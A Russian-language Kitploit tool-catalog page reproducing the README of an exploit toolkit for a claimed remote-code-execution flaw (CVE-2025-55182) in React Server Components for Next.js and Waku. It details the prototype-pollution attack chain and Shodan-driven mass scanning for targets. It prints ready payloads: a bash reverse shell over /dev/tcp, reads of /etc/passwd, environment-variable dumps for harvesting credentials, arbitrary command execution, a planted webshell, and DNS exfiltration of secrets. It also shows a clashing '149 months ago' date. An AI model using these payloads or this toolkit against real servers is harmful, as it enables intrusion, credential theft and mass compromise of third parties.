Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-RCE-CVE-2025-55182 — Продвинутый набор инструментов эксплуатации RCE для уязвимостей React Server Components. Включает множество предварительно созданных полезных нагрузок, интеграцию с Shodan для поиска целей и массовое сканирование для авторизованного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/ilixm/poc-rce-cve-2025-55182
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubilixm/poc-rce-cve-2025-55182

PoC-RCE-CVE-2025-55182

Продвинутый набор инструментов эксплуатации RCE для уязвимостей React Server Components. Включает множество предварительно созданных полезных нагрузок, интеграцию с Shodan для поиска целей и массовое сканирование для авторизованного тестирования на проникновение.

Репозиторий
149 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 RSC RCE Exploit Toolkit

Version License Node Platform

Продвинутый инструментарий для эксплуатации уязвимостей удалённого выполнения кода в React Server Components

Только для авторизованного тестирования на проникновение и исследований безопасности

Возможности • Установка • Использование • Интеграция с Shodan • Примеры • Отказ от ответственности


📋 Содержание

  • Обзор
  • Детали уязвимости
  • Возможности
  • Установка
  • Быстрый старт
  • Использование
    • Базовая эксплуатация
    • Доступные полезные нагрузки
    • Пользовательские полезные нагрузки
  • Интеграция с Shodan
  • Автоматическое сканирование
  • Примеры
  • Меры защиты
  • Затронутые версии
  • Участие
  • Отказ от ответственности
  • Лицензия

🎯 Обзор

Этот инструментарий эксплуатирует критическую уязвимость удалённого выполнения кода (RCE) в реализациях React Server Components (RSC), нацеленных на:

  • Next.js (версии 13.4.0 – 14.1.0)
  • Waku (уязвимые версии)

Уязвимость использует загрязнение прототипа (prototype pollution) и небезопасную десериализацию в механизме обработки данных RSC для достижения произвольного выполнения кода на сервере.

🔴 Степень серьёзности: КРИТИЧЕСКАЯ

  • CVSS Score: 9.8 (Critical)
  • Вектор атаки: Сеть
  • Требуемые привилегии: Нет
  • Взаимодействие с пользователем: Нет
  • Последствия: Полная компрометация сервера

🔬 Детали уязвимости

Техническая справка

React Server Components используют собственный формат сериализации для передачи данных между клиентом и сервером. Уязвимость существует в том, как эти фреймворки десериализуют и обрабатывают специально подготовленные полезные нагрузки.

Цепочка атаки:

  1. Создание полезной нагрузки: Сформировать вредоносную полезную нагрузку RSC с циклическими ссылками
  2. Загрязнение прототипа (Prototype Pollution): Использовать $X:constructor:constructor для получения доступа к конструктору Function
  3. Внедрение кода: Внедрить произвольный JavaScript в поле _prefix
  4. Выполнение: Сервер десериализует и выполняет полезную нагрузку

Схема эксплуатации

Атакующий → Вредоносная полезная нагрузка RSC → Целевой сервер
                                                     ↓
                                     Небезопасная десериализация
                                                     ↓
                                      Доступ к цепочке прототипов
                                                     ↓
                                         Конструктор Function
                                                     ↓
                                   ⚠️ RCE ДОСТИГНУТО ⚠️

✨ Возможности

Основные функции

  • ✅ Поддержка нескольких фреймворков: Next.js и Waku
  • ✅ 8 предустановленных полезных нагрузок: От PoC до полноценных reverse shell
  • ✅ Выполнение пользовательского кода: Внедрение любого JavaScript кода
  • ✅ Интеграция с Shodan: Автоматическое обнаружение целей
  • ✅ Массовое сканирование: Автоматическая проверка нескольких целей
  • ✅ Профессиональный CLI: Полноценный интерфейс командной строки
  • ✅ Подробное логирование: Цветной вывод с временными метками
  • ✅ Обработка ошибок: Надёжное управление ошибками

Предустановленные полезные нагрузки

Полезная нагрузкаОписаниеСценарий использования
consoleБазовый PoC (console.log)Проверка уязвимости
reverseShellReverse shell на BashПервичный доступ
readFileЧтение /etc/passwdДоступ к файловой системе
envDumpВывод переменных окруженияИзвлечение учётных данных
execCommandВыполнение системных командПроизвольное выполнение команд
webshellРазвёртывание веб-шелла на ExpressПостоянный доступ
exfilPackageИзвлечение package.jsonАнализ зависимостей
dnsExfilDNS-эксфильтрация (OOB)Слепая эксплуатация

📦 Установка

Предварительные требования

  • Node.js >= 16.0.0
  • npm или yarn
  • Shodan CLI (опционально, для автоматического сканирования)

Клонирование репозитория

git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit

Установка зависимостей

npm install
# или
yarn install

Настройка Shodan (опционально)

# Установка Shodan CLI
pip install shodan

# Инициализация с вашим API-ключом
shodan init YOUR_API_KEY

🚀 Быстрый старт

1. Базовая проверка уязвимости

node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console

2. Получение reverse shell

# Запуск прослушивателя
nc -lvnp 4444

# Запуск эксплойта
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

3. Выполнение пользовательской команды

node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload execCommand \
  --command "whoami"

📖 Использование

Базовая эксплуатация

node rsc-rce-exploit.js [опции]

Опции

ОпцияОписаниеОбязательно
--target <url>URL цели✅
--framework <name>Фреймворк: next или waku❌ (по умолчанию next)
--payload <name>Имя полезной нагрузки (см. ниже)✅*
--custom <code>Пользовательский JavaScript код✅*
--lhost <ip>Ваш IP (для reverse shell)❌
--lport <port>Ваш порт (для reverse shell)❌
--command <cmd>Выполняемая команда❌
--endpoint <path>Пользовательский RSC endpoint (Waku)❌
--action-id <id>Пользовательский next-action ID❌
--listСписок доступных полезных нагрузок❌
--verboseПодробный вывод❌
--helpПоказать справку❌

*Требуется либо --payload, либо --custom

Доступные полезные нагрузки

Просмотр всех полезных нагрузок:

node rsc-rce-exploit.js --list

Вывод:

📋 Доступные полезные нагрузки:

  console              - Базовый PoC - вывод в консоль
    Код: console.log(7*7+1)

  reverseShell         - Reverse shell (bash)
    Код: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - Чтение /etc/passwd
    Код: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - Вывод переменных окружения
    Код: console.log(JSON.stringify(process.env,null,2))

  execCommand          - Выполнение системной команды
    Код: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - Запись веб-шелла в /tmp
    Код: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - Чтение package.json
    Код: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - DNS-эксфильтрация
    Код: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)

Пользовательские полезные нагрузки

Выполнение любого JavaScript кода:

node rsc-rce-exploit.js \
  --target http://target.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"

Скачать инструмент